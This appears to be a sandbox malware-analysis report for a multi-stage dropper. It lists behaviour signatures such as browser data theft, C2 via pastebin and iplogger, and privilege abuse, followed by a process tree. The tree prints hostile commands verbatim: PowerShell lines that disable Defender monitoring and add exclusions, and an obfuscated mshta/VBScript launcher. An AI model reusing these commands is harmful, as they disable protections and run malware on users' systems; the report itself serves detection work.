N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe

"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe

Thu128b511c77e8c.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe

Thu12465fe68f85b6156.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe

Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe

Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe

Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe

Thu12ca1c119bc29.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe

Thu1231d30cda84872.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe

Thu1262fd911d3e6320.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe

Thu12b275ee70c7e913.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu120bfbc2443b3b5d.exe

Thu120bfbc2443b3b5d.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe

Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe

Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe

Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe

Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp" /SL5="$80016,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe"

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe

"C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp" /SL5="$90016,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"

C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe

yDhNY.exe /pFKkSWJQc5v2ppVFMo

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -Im "Thu12493eba7a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 480

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

